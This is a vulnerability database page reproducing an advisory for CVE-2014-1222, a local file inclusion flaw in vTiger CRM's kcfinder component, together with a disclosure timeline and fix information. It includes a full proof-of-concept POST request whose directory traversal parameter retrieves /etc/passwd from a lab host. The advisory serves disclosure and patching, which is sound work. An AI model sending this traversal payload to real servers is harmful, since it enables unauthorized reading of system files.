Vulners
Lucene search
vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Vtiger CRM 5.4.0, 6.0 RC, 6.0.0 GA - Local File Inclusion Vulnerability | 12 Mar 201400:00 | – | zdt |
| Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities | 2 Apr 201500:00 | – | zdt |
 | CVE-2014-1222 | 12 Mar 201400:00 | – | circl |
 | CVE-2014-1222 | 12 Aug 201423:00 | – | cve |
 | CVE-2014-1222 | 12 Aug 201423:00 | – | cvelist |
 | vTiger CRM 5.4.0 kcfinder LFI | 2 Apr 201400:00 | – | dsquare |
 | EUVD-2014-1302 | 7 Oct 202500:30 | – | euvd |
 | vTiger CRM 5.4.06.0 RC6.0.0 GA - browse.php Local File Inclusion | 12 Mar 201400:00 | – | exploitpack |
| Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities | 31 Mar 201500:00 | – | exploitpack |
 | CVE-2014-1222 | 12 Aug 201423:55 | – | nvd |
10
CVE: CVE-2014-1222
Vendor: Vtiger
Product: CRM
Affected version: Vtiger 5.4.0, 6.0 RC & 6.0.0 GA
Fixed version: Vtiger 6.0.0 Security patch 1
Reported by: Jerzy Kramarz
Details:
A local file inclusion vulnerability was discovered in the ‘kcfinder’ component of the vtiger CRM 6.0 RC. This could be exploited to include arbitrary files via directory traversal sequences and subsequently disclose contents of arbitrary files.
The following request is a Proof-of-Concept for retrieving /etc/passwd file from remote system.
POST /vtigercrm6rc2/kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
Host: 192.168.56.103
Proxy-Connection: keep-alive
Content-Length: 58
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.56.103
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.56.103/vtigercrm6rc2/kcfinder/browse.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,es;q=0.6,pl;q=0.4
Cookie: PHPSESSID=ejkcv9cl3efa861460ufr39hl2; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
dir=files&file=/../../../../../../../../../../../etc/passwd
Note: In order to exploit this vulnerability an attacker has to be authenticated.
Impact:
This vulnerability gives an attacker the ability to read local files from the server filesystem.
Exploit:
Exploit code is not required.
Vendor status:
23/12/2013 Advisory created
03/01/2014 Vendor contacted
14/01/2014 CVE obtained
27/01/2014 Vendor contact reattempted
10/02/2014 Vendor working on a fix
12/02/2014 Fix released
13/02/2014 Fix confirmed
11/03/2014 PublishedData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Mar 2014 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24
EPSS0.09795